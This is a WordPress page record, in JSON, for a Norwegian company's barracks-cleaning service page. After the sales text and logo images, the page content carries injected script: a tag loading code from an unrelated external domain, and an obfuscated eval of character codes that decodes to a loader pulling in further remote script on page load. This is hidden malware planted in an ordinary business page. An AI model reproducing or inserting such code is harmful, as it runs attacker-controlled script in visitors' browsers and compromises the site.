{"id":5076,"date":"2021-02-24T05:13:54","date_gmt":"2021-02-24T05:13:54","guid":{"rendered":"http:\/\/ms24.no\/?page_id=5076"},"modified":"2023-11-06T21:34:19","modified_gmt":"2023-11-06T20:34:19","slug":"brakke-renhold","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=5076","title":{"rendered":"Brakke renhold"},"content":{"rendered":"<p>Alle bygge plasser bruker brakkel\u00f8sninger i kortere eller lengre perioder. Milj\u00f8 Solutions AS utf\u00f8rer renhold i alle typer brakker. I tillegg til brakkerenholdet tilbyr vi leie av matter. Vask og bytte av disse, innkj\u00f8p av sanit\u00e6r artikler som toalettpapir, t\u00f8rkerull, s\u00e5pe og annet rekvisita.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/gronn-punkt-e1611063978829.png\" alt=\"\" width=\"81\" height=\"83\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/Startbank-140x105@2x.png\" alt=\"\" width=\"124\" height=\"93\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/renholdsfirma-oslo_orig.jpg\" alt=\"\" width=\"161\" height=\"82\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/mva-registrert_orig.png\" alt=\"\" width=\"179\" height=\"115\" \/><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2021\/01\/renholdsbedrift_orig.jpg\" alt=\"\" width=\"109\" height=\"70\" \/><br \/>\n<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Alle bygge plasser bruker brakkel\u00f8sninger i kortere eller lengre perioder. Milj\u00f8 Solutions AS utf\u00f8rer renhold i alle typer brakker. I tillegg til brakkerenholdet tilbyr vi leie av matter. Vask og bytte av disse, innkj\u00f8p av sanit\u00e6r artikler som toalettpapir, t\u00f8rkerull, s\u00e5pe og annet rekvisita.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-5076","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5076","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5076"}],"version-history":[{"count":14,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5076\/revisions"}],"predecessor-version":[{"id":5941,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5076\/revisions\/5941"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5076"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}